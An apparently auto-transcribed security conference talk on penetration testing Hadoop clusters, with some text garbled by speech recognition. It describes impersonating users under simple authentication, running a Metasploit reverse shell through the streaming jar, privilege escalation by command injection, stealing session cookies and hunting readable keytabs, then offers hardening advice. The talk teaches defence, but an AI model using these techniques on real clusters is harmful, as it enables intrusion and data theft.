← All talks

CG - Hadoop Safari : Hunting For Vulnerabilities - Mahdi Braik & Thomas Debize

BSides Las Vegas53:48137 viewsPublished 2017-08Watch on YouTube ↗
Mentioned in this talk
About this talk
CG - Hadoop Safari : Hunting For Vulnerabilities - Mahdi Braik & Thomas Debize Common Ground BSidesLV 2017 - Tuscany Hotel - July 25, 2017
Show transcript [en]

thank you everyone for being here we are really glad to be in Vegas including from France so I'm Tomas and MIDI and some Shu point before starting first as we are French please excuse our broken English that first one the second point is who you are basically some auditors in info information security responsive incident we have several years being professional so that's it what what is the agenda today so briefly we will introduce you let me ask you something first who's Reggie Wayne who's familiar with a doob who's ever heard about a dupe using MapReduce cool so a lot of people that's that's great so we'll be moving on quickly from the first part to the second in the first

batch we will introduce briefly a dupe and its security model and to understand what are the known limitations and then from the second chapter second section we will be a reviewing how can we pull and what are the different steps in order to assess the security of a do cluster there's some coupons few tricks and by the end we will be giving you some recommendations as we have been auditing and penetration testing several other clusters mainly mostly for for French client but we get some realization that topic so we can guide you and give you some I hope good advice so Hadoop what is a loop is an open source framework that I was for the

distributed processing of large data sets and using simple programming model for the distributed processing so you know the MapReduce algorithm at at the beginning it was invented by Google in order to sort an index web pages large large amount of web pages here is the principle I won't be telling it but you can see that you have different phases mapping shuffle and reduce the the goal is to sort some some stuff using a lot of different nodes by grouping them on some unlucky that's the first one then for the open source point and character characteristic of a do I do comes is now back from a patch and from the Apache foundation from several years now is completely open

source and free and but in real life I do promote I gathered in distributions just like Linux the the current three main distribution that the following so Claudia often works in mother really in real life you find eighty percent of of clusters where is my 80 percent of clusters are either clodia of often works Claudia have fun proprietary stuff autumn rocks because fully open source restful open source with only open source products and the cheaper license fee and mapper is doing Hadoop without a dupe to be sure they are fully understood what a diplomate Asians in terminal performance are and are trying to bypass this kind of this kind of limitation we will be talking about the name node limitation

just after they're fully understood the case and they are doing Hadoop without really how do I do this just a connector for some stuff but in real life we are mostly doing some cloud era optim-ox distribution the common point is to is the use of the a patch a patch core framework which is doing mostly only to stuff basically a dupe is what storing a large data set and processing large data set that's the only point in real life what does a real be that element looks like it's at the beginning you you're buying a lot of CPU RAM disk on top of it you're putting the I do co2 in a lot of support at the life

cycle in the platform for the acquisition here are some different modules you will see different modules that will appear in that in this slide for acquisition you have like relational or non-relational databases and most importantly you have HDFS GFS which is the distributed file system in order to store law large data sets then for the processing you have a lot of modules really different modules maybe the most popular right now Apache spark attached I don't know Apache drill for SQL SQL requests and on the deep core you have MapReduce in yarn MapReduce which is the algorithm in order to distribute some tasks and yarn which is a scheduler like a plane operating system is just and it's pretty

complicated to be fair it's just odd scheduling and managing some resources on the crystal then you have some indication module I guess you ever heard about elastic Suraj Salah listen at the end you want to construct your data so you have different module for end users mostly web applications in order to be almost as friendly as possible so you have Jupiter which was I Pete on a book I pad on that book you how they are you tableau SAS which are sassy it is a non non old window public data a coup its plankin and so on for the administration typically for Claudia you have the cradle manager which is a proprietary product for Auton works you have a patch

unbury which is doing all supervision and administration for the cluster and you have different for each distribution like a proprietary or a specific management platform and at the end because we are here for this today security so you can see that security there's really two modules and even in these modules there are really they're very one task a note which is a gateway Ranjha which is the central policy management and you can apply some your copyright policies and how to protect data and to put on some ACN some tree which is to be you know like one rival of ronzo but in VN in in real life tell me after in from one but it is kind of

broken and not really useful and not really not really user-friendly but that's a bit abandonware and you have record service which is coupled to some tree the roster but mostly for security modules you don't have many stuff that's the first observation that you can can can make by looking at the equation a typical system a dupe under you do two parts as I said storage and processing processing so you have some data nodes which are stirring the food data paths and you have a single active name node which is typically a mapping list of the five paths since the name node knows for your file which is divided into blocks two different sub file they are stored

among among that in they cannot they note where no knows where you can retrieve the path of offshore wanted file for the processing as I said you have my produce and young MapReduce being the job distribution on the cluster and young which is a scheduler yun is a pretty as I said pretty complicated stuff and we haven't been digging that much into the security of it I guess there are some real number it is to be fair right now you can say okay cool but really you who uses a dupe anyway in the real life so from the official I do pages you can find some different providers or web web Giants using it and you have an idea of their

number of node a node is a server to be fair with with a lot of resources CPU runs and this and you can find you know the Yahoo has a lot of doop nod and his and was massive maintainer and massive contributor to the project hi everyone so note that who matters we had secret I will present it security model so first let's talk about authentication so by default there is no real authentication mechanism implemented on i dub or mostly is the the ototoxic Asian mechanism called simple which is implemented but by default so without Kerberos which is the user authentication mechanism available on a loop the cluster won't verify your identity so you pass the

string for example you are HDFS and the cluster will trust you so the two mod authentication mode are simple which is just identification and the other is corrals which is more difficult to implement so simple authentication is just identification and you can be whoever you want which service you want you can perform any action with any username that you want you just have to provide this name so to improve the security you have to implement the whole proper authentication mechanism which is Kerberos and which is more difficult to implement on the cluster so be careful when you activate authentication because on a dupe you can activate partial youth education with carriers and and for example you have the parameter to to

implement authentication on the whole cluster just on the core a dupe so that the parameter but then you have to also to enable the authentication on the web pages because there is a lot of there are a lot of interface web interface which are accessible to the user and if you do not enable this parameter you don't put Kerberos we will have the simple authentication activated on the service and any user could be he wants but then you can you have to also to to activate this parameter which which allow to which use anonymous anonymous authentication so you have to disable this parameter and then you have also to also to enable this parameter to to

activate authentication on the yarn service so you have to put carriers instead of simple this on these different parameters in order to activate curved arrows on all the services just not and not just on the on one of these service so be careful and that's that's a big deal because we have see several time authentication enabled but not on every interface so that's soon so in the end it's like simplification is like deployed and you can access and be whatever user we want so be careful that's the first strong point for I have security remove all simple odds and that's not just one parameter that's a bit tricky but that's the first trap not to fall into we will we will show you

some films attached etc based on the simple authentication so next authorization and auditing so we will show you there is and as Thomas already showed there are a lot of service components on a deep cluster and each of these components implements one authorization on or one auditing model for example you have the HDFS which which is the Hadoop distributed file system which implements POSIX permission with extended SL like on Linux so you can have a user group and an author and you can set permission for this these different people and also use sa since the 2.5 then you have for example hive which is a SQL DBMS on a dog which implements authorization on sequel verb

for example you can grant you access with select to one user and you can grants directed to another user and perform authorization model on using this sequel verb ACL so you with this two example you see that there are two authorization model for two components and that's the point you have lots of authorization model it's difficult to manage so in order to manage you have some third-party components which are used in order to manage all this office UK education model and to to centralize this management in order to simplify the administration and these components are also used to concentrate to the security and the audit policy and the security logs for example you have the Apache

Ranger that Tomas already already talked about which is the only serious components used for security feature which allow audits auditing new centralization log of centralization administration of the authorization mother deploying of Kerberos etc and it's only package with the Hortonworks which is the most open source package that you could use and then you have also a past century or a cloud era record service which which are coming with with with cloud era cluster but which is not as mature as rauner is so for the moment the only strong third party module is around here on century you can perform something but it's more difficult to administrate and it does not implement all the capabilities of

render so next data protection as the the cluster are often used to store sensitive data is it's an important feature so you have to - encryption features we have encryption in transit it's when the encryption of the flow of data and encryption at rest which is encryption on storage so this to encryption are available by default on the do but you have to implement Kerberos in order to activate it then so encryption teen transits for the communication with the name node which is the node which old the indexed of the of the file etc you have freely available and protection mechanism views on purpose RPC shame and is ASL mechanism so you have the authentication

of me which is no option but just authentication then you have the integrity setting which is authentication and integrity and you have the privacy which is full of krypton including authentication and integrity for the communication with the web interface you have also by default the the capability of of activating SSL and TLS on the on this service but it's not it's rated by default then for the communication with the name node data node sorry its own its prettiest the same that on the day node you have a data transfer protocol which involve two phase key exchanges in three deaths and rc4 which are not the strongest algorithm algorithm we know an encryption which is used by a us

algorithm using a different size of key before 128 bits then you are you are the encryption at rest hadoop implements its own encryption model which is based on to two key which is the encryption key used to encrypt the directories on the cluster and the and the in a key dec history which is the encryption for the file okay so you have this gem which will show you minimal architecture so you have the inane node you have the clients sorry yeah the name not you have the clients and you have the kms the name not store the EDA key the kms sword the deck the deck key and you have the Android the clients so you you ask the day node for

the index key which asked the kms which all they are cell if you if you are allowed to access the key the chemists will give you the decryption key you can decrypt and then manipulate the file and store it after so here you can see that the security boundary is not the crypto system or not not related to cryptography button just on the ACA and the rubbish nest of the game as you because the chemists old all all the key so if you can tune the kms you can access to all the key and decrypt all the data so it's not a crypto problem but he just robustness of a chemist that the boundary just just one word about

the cryptography you may ask what is the overhead and what are the drawbacks of using in transit and at rest to be sure there's no rematch overhead using in transit this is pretty much a shun you know known with SSL TLS yeah no performance impact but to be to be honest fortress you have some performance impact in the documentation they are speaking about at 20% I think it's it's pretty correct try 20 maybe even 30 percent of personals wasting yeah I guess I would say but that's the that's the price to pay today in order to have attrition that at rest for defenders what be careful again this is not the first section you put encrypting or

flipping the data reg is not the very most very first action you have to to implement in most of the case we we've seen option encryption at rest is really mandatory for some regulations I guess you have some and you have some in the US but this is to be fair not the first point and not the first security measure to put in place no creation at rest in Indian but in front rosy this is pretty much mandatory and this is really common so for the next part we will talk about the mapping mapping the attached surface so as we are entering the second section which is focusing on the attack techniques to be fair there is no much

we will see some some defensive measure after but the point of that talk is really attacking how you can attack a cluster and and improve improve its security in the end from our experience an adduct deployment commonly follows one of the three following topologies so I then add an attacker know your environments know where you are I know in which case you you are connecting your assessment so first you have the simple topology which is everything is exposed on the corporate network you are plugging into meeting room and you can access every you can the infrastructure is very exposed and the one on the corporate network I guess so you have you can find just on the

flats network in flat topology you have some H nod what is the national energy on is like a bastion it's like a unique entry point to a cluster this is basically what the John is a Linux server offering you have to connect on this with SSH and just offering you know the a dupe Native Client you know doc to perform some actions that will be see after like a doop doop lists me list me some fire at the slash path and so on this is for I diffusers to you know dot well there they are working over a month you know stand down and having the same bin arisen having the same version and not not not administering in in reducing

your action from your own PC with different Russian and so on then you have the name node you understood that the name node is a single point of failure because without name node you can you can't access anything and on the cluster and you have some deacon not storing the data so as you may understand this is this represented by that extra face you have a chance I probably T of pruning some stuff and will be an existing some data on some resources then you have the second topology which is a bit better where you expose only necessary end-user services because in the end on nuclear stuff you don't have many usage mini use case and

you don't it was a fall from a security point of view it's not good if you have multiple entry points and multiple way to access a cluster so in that topology you only have the edge node and some web apps for consultation so Claudia are you Jupiter I fit on that book zip in which is the open source and open source version of Jupiter not an open shot not the sorry not the Pancho's version but another open source version of for the same usage you have a notebook you can input some commands and retrieve some data from different data sources and then you have the internal network that time you know you can see the you know

the name node are not exposed on the corporate network that's a bit better so in the topology that xfa is really reduced to be fair because as an attacker being plugged on the cooperating drugs you won't see much stuff and you must Indian exploit trivial or default credential on this on these services or web you know our inability on the web apps which exist by you and the last and the most restrictive topology which is the highly segregated version from the corporate network you have a unique or true a unique access point which we can be see tricks or bastion and whatever I won't say I won't quote some some brands but you understood the idea of having one

dedicated on three point where you can implement logging logging stuff GLP and so on then you can see from that bastion affronted the front end a dupe network which are again the edge node and the webs for the end user and you have the back end and imagina there is some some fire wars between each each Network in implementing some granular access lists and so you have the back end from that topology you can see that in order to access the back end you really have to first go on to and to access the base channel which reduce the probability and then you have to prune some stuff from the edge node of Web Apps so again it

divides the probability so the attic surface is really minimal and as I said from the first patch you have a unique access point you want our loop infrastructure and you can implement some more compulsory conserving measure like logging and gel B so the first step when you will try to from pen test on the processor will be to map the attack surface so first you will see a lot of service if there is no network segregation or network filtering because as we already told there are a lot of theories available in cluster for example the HDFS related services which are for example this this this service which which is used by the IPC connection then you have some web access

interface and web app API for example see this this HTTP interface which are used for example to browse the HDFS file system and then you have also some young related interface which are for the first one the IPC IP support and then you have the HTTP port for for viewing the log of the young service of the task yeah young as I say the schedule we just scheduled some tasks from from these services you can submit the task and follow a status and then we just put some old stuff that we you might not not see on the pen test on new cluster so then on the data node you have also a lot of services this TCP

service is is used for HDFS data transfer and it is called when you use for example of the Hadoop FS the - comment then you have some FS which which is which are which is for sorry pretty much the same that this one on the DNA not a lot of of interface that are commonly used on the data and may not and which are very verbose and the same on the in the neighborhood and the data and there is no much difference between them and then you have some young stuff also on the data node for example on this part so I will show you some some example after and then you have also some interesting third-party module we

did not put all the the module but some interesting stuff we have the HTTP FS interface you have the cloud era manager which is used to manage to cluster you have the Apache I'm Barry which is pretty much the team that's cloud there our manager is rude also to to Mendel to cluster you have the aperture in her interface cloud there are you extra so let's see the interface like I said before you have here on the name not the the interface you can browse the the HDFS and see the different file and you can also download all this interface are related with an API and there are some call with the API and we'll talk about after we have the

pretty much the same but maybe a little bit more ugly on the data nut but it's the same thing we can roll it that another browser name okay then you have the young interface which are used to preview the the job which are running [Music] and the container launch head etc you have the this this one you can see which resources are used for the moments on the cluster exit app so you can view the story of the of the yarn that then it's pretty much the same that than the previous one you have some job story young young sorry so you can use nmap the map to in order to figure Fritz disservice because there are some some

some scripts on stream three which have been developed in order to in order to identify this service you have very easy to track data the output is like this one so you can view which which service is listening and in order to to cartography the network so after you you you made your you're mucking net one my thing what you want to do to access data how you would like to do through browser because you are lazy really lazy you want to use your own browser to access anything so you have to use and you will be cutting in the end web each GFS API which is you may understand how to access HDFS through a web api it offer a

Resta appear to access data it you can do pretty much everything with the gfs and where can you see some ETFs what is EFS every season some first on the HDFS that another web um is that you suggest before on also the HTTP module which is just exposing webby GFS and in the end also on it Apache knocks get well which is all UNIX only exposing some webby GFS and some some stuff I picked up ash Knox is a security component but it is only a gateway and it is only for network network purposes and I you how you can filter and put in place just a single entry point for your data infrastructure so now what is the cluster only enforces

you know simple simple application which is again a notification that you can access any store database by using the username parameter that's not a bug that's a feature and that's an authentication feature thank demo so here you can see one the command interface that you can see a lot of variables data from the configuration here if you go to the treaty's brought the system you can browse and access whatever you want and then you can you see the permission the permission denied message you're saying that by default on Doctor Who and I can access that that folder because I'm not you know and not fight the falcone user so and now if we can call under the hood under the hood

of this this is just calling the GFS API that you can see here so here you have your pass on the HDFS you put on some some cooperation lista choose open G late in whatever and so here I want to access you know the slash user slash HDFS directory and it says I'm not a lot because I'm Doctor Who okay if this if there's really some simplification in nokia bellows which is the strong strong security point you can input whatever you want and you can be HDFS and that this time you can you can you can see an access everything so just by inputting your engine username that's pretty ridiculous but that's a security model

that's why you have to implement Kerberos this is a strong requirement and then you can access access some data erectus just by saying firstly we have created a fine name besides and you can oh sorry this won't worship because of some networker stuff but here I can access the file this is the next step is to open the file and now I would just being able to to have the complete you know tree directory tree on the cross which is really useful fight occurs another because you have to access data and yeah so we've been developing a tiny script this video there's no magic in this is just automating some web gfs course and you can you can browse everything and

now if you want to access data but through CLI in a dupe native stuff you can input the same username the use of the name parameter you can input it as a element variable and here you can see first I'm denied because I'm toe to toe then I'm seeing an HBase which is a non relational database and then I can access I guess access everything that's pretty much as simple as this you can just maybe bring a slight demo so you can can access this that's it I guess this is a you see the first point when you until a dupe you know that you think that big data is really quick and fast no that's a joke because everything is

is in Java everything is pretty much slow so here I can because I'm rude I can access everything goes I'm new I'm rude I'm not the correct user to access it so I will just say that HDFS just the same as you run it use all the temporary table and that time I hope it will work it worked you can access there's no magic in here so that's the first one being able to access some detail on the cluster but then we have some more interesting attacks which means we'll introduce yes the after you have access the data you want more you want execute code on the cluster so remember a dupe in the framework used to execute some stuff

some comments in order to sort file etc extra so we simple authentication as we have see you can do pretty much everything you want so let's let's try to execute some code so a dupe is developed in Java so by default I would say you have you are forced to develop in Java but some people have developed the a dupe streaming jar which is used in order to execute any kind of script Python bash etc on a dupe so the the common line is this one so you have the Hadoop jar you put the the pass to the streaming jar you put the input file which must not be empty you put the output directory and the mapper for

example bin cats it is his / password and the reducer known because we won't use reducer it's not to be much in order to be faster this is just a slight optimization just because you don't need wait for this test you don't need a really really sir so then you you try to to check if the and have been successfully performed and then you can read the file and for example you have the access to the stash this is not password file so then so like we have seen there a lot of step in order to access the the file and the data so we want we want to to optimize this this process so we will use

Metasploit in order to to have a real entirety shop so we will use reverse speed reload the reverse speed road is generated by the command line miss my name is a theorem then you you launch the Adept streaming by adding the file file parameter which is used in order to upload the MSF payload which have been generated before on the cluster and then execute it and you have to execute it with the background parameter in order to not stop the process after the after time Mart because if you don't put a background parameter you will your process will shut down after some time at so let's have a demo as this is as you may take some time

will we launch and will go on and hopefully we will see we will see the shell arrive on our on our computer so here is my attacking machine you can recognize Kari so here all set not who just to to listen for the for the on layer and then our just a prod and try to execute my not much aperture but we reverse disappea for the reason we expose the straw so I guess it would it should be okay this is just sending you know the payload this is admitting the job and missing good job so which in token yeah okay just to wait in order to have your connection back so but like we said the a dupe is

pretty slow and even more on our computer machine so we have to wait until here you can on the putea window this is the access on the server side this is just for monitoring purpose for demo just to see when the payload gets executed but normally as an article you don't have access to that protein window you're just with your Metasploit in your attack in experiment wait we just have to wait so we don't know when it would be exhibited that's the first one to be that big data you don't know where you when your job will finish so let's move and we'll go on just after when we see the shadow right just some it's a good

cut so you buy a dupe is a distributed processing model so you can recruit a decryption code on many nodes and you don't have the capability to shoes on which nut you want to execute your cut so you will launch MapReduce job the adult core will choose on which not it is a job and you but you don't you can't target a specific node so that's the first the first point you can't target specific then you have to to configure your adept variants because we didn't show you because it's not very interesting in our demo but you have to set up your environment in order to be able to call the other clients I do Client executable so you have to

retry the configuration in order to get the configuration you can access on pretty much pretty almost on all the the web interface expose the slash conf slash confer pass and you can retrieve the configuration on this this interface then so you can there is also some vulnerability on third-party module which allow users educated user to access the configuration so in order to yeah I'll show my right come on so yes so that's a bit long but our right and youyou we are able to execute cut on the cluster so we are here yarn which is normal because the yarn is the the user used in order to execute job so yep you can access there's no magic here as I do just

allows to to execute some stuff but if your user is really pretty malicious you would execute another path or something like this and we will show you the variety after but once you are on the cluster you can browse the data node on which you are and and try to find some some file and we have found that some file are not well protected for example on the you interface by default the configuration file is readable by anyone so you can read it and if you read it you will have access to the data the database password used by you so you you could access the hash the username etc but you also can access once you access

to the database to the session cookie and by listing the session cookie you can just take the session cookie of the administrator and canary use this is one variety we should just after but you can see you we just showing you that when you install you idea for pretty much on the same server and there's a Verity of ten minutes let's move thank you so we have developed a script in order to retry to automatically automatically retry a minimal configuration which is called a dupe Snooper you can find on github and we you just have to learn the script if retry from automatically the configuration for you so you can say okay that's good but come on weak to

this service anyway on the internet for instance with the Shannon request you can see a nice dog is that what all the result here are not really a due process but that's a good input not find some so yes the point is is there's they already add some new cluster free accessible on the internet and some figures from a study alone so I was mender stood well the first point is to say to see if there's simpler kevro's of application so from this figure I guess you understand that there is no much clusters with camera implemented and also points at the watch out point when we say remove all simple odds from that the figures on the right shows you

for the five glamorize cluster how much how many are implementing you know a fully implemented cameras end-to-end and onto HTTP interfaces so you can say you can see 0 and again that's cool but come on who's really interested in attacking at the stuff so in in the media you can find some stuff there's some run somewhere and some people are wiping some I dupe databases on the internet you can find here with a slight message no data for you secure your there are pretty much encrypting or removing everything and you have to pay your ransom and you can find some stuff in the media so that now let's let's see how you can put on Krista with Antron

sake a dupe component so here we are exposing your analogy that allows you know any authenticated user on the on the matching to to impersonate and to steal the identity of the etfs user there was a Bernard well this is this is patch now but for this version you can find a lot of actual and current cluster having that rationale below and here when you are putting that command that that's the real novel come on GFS groups something it tried to retry to retrieve the groups for user and this is not escaping correctly stuff so you can see that you can execute anything and here you can see that the command is exhibited as the HDFS even

for credit now for Tokyo to attack a barrage cluster no simple not not Ricky oh no simple stuff like this you can with this reality go from Dwight sorry so fresh you can go from your identity to HDFS again ETFs is the root user on the rooted for system you can do everything you want on the on the on the projector system with that user we are not the variety find out we just documented the exploit as no stuff has been published even even if I do be fully open source some demo time I just show you to say that we are not bullshitting you

[Music]

so I'm just trying to put a file you know into a session P to see that which is alright executing this and now if I can just yes I mean ahem HDFS so I moved from Toto standard user with no privileges to HDFS with this is the relative how you can expect it how how bad is it the prerequisite for Baku city is that the shape based unique group map in should be used this is not the default value and we are not expecting to find much cluster with it again some figures from ours to differ on the internet you can see in purple a mini cluster now you have some room on cert party modules even security modules

Apache Ranger you can see a nice inscription so you can you can use to stuff dump use our credential but they are ash that's not pretty much not interesting and all better don't use up session cookies and reuse them that's easy you don't have to crack anything remember that rendre is the security module and there is a sequel nutrition on the login guess we already talked about before on the cloud there are you which which is often installed on the edge node which is accessible by every user that we showed this game before and there is a vulnerability which is that the you dot ini' configuration file is really evolved for owner 21 so you can

just steal the the credential of the database and then still the cookie on the under the debate that we show we have the session cookie we can just take it and reuse it in order to access the the administration interface of you and the mitigation is to unset the permission of not more importantly not to me no you because this isn't a web application you don't have to deploy a web application on the nation not because an attorney is like a client you know deported client and you don't have to install what application on the side of an edge no that's that's a bad design but we've been we now have the region it was not

really here for us but now it's clear do not study anything except I do clients I do p FS - FS or whatever no other application and in the end our maybe last but not least high technical high skilled attack our most elite attack is is that for generalize cluster that come on tries to find any key tab accessible on repos read further story and in real life it give you that kind of results you from we developed a slight theory where prills scientist in a grey box attack with only one profile accessing an edge node or server with a simple profile no privileges just with this command you will collect and you will be able to access 80% of

the of the data leg because of because people misuse it as their you know what what is that don't know that key tabs is all pretty much the time that a password so that they just told the file with read further refer the rights and so as a defender please put in place some detection measure not just to see if there are some key tabs accessible to 21 that's the really a strong measure again this beside the simple notification just put put in place some significant bit acute control because people will do and will misuse kidnapped no read falls off it so now if you also want to start inching forward venerate is with us

get on the boat with us and as steady and you could be a challenge use a prepackaged of our not which is really easy to install eases the standalone new virtual machine as you the demo we perform are in standard machine get on the boat with us try to find some stuff and make the big thing upon to falsify double security everything we we printed today everything every room every stuff are published okay two minutes are published on our github please we are already eager for some feedback and some contribution please now taking a step back that you can see that this security maturity of the of that ecosystem a'dope is not a technology built upon security no encryption by

default no the real application by default then you have a fragmented ecosystem Apache Avenger is not is only accessible and package for often works best on one stuff there's a lot of image immaturity in secure development you have a lot of classical veneer it is even for security modules and you have a complex a personal security because people will misuse Cameras Cameras file so some simple recommendation so first and most important carry out your cluster because like we showed you if you don't carry out the cluster you will have no security on your Kerberos cluster then reduce the service exposition we have seen that the survey the services are very very variable there I suppose sensitive information

and so the two data so you have to reduce the exposition then don't give a free shell if data scientist does not have the rights to to launch your yuen yuen job do not allow us to do it then deploy the application do not deploy application on edge not for example you that you have see it's affected by vulnerability then try to prevent and detect the misuse of Kerberos key tab it's very important because we have see a lot of cluster paralyzed but with lots of key tabs available for for everyone and then try to harden it's I think the most difficult recommendation try to harden component and try to keep up to date your cluster it will be a

challenge to keep up to date because it's a it's a big issue but you have to you have to do it so thank you that's that's all for us for thank you for being here what is it eight to give us your feedback and continues the description and started institution on schedule good car and thank you [Applause]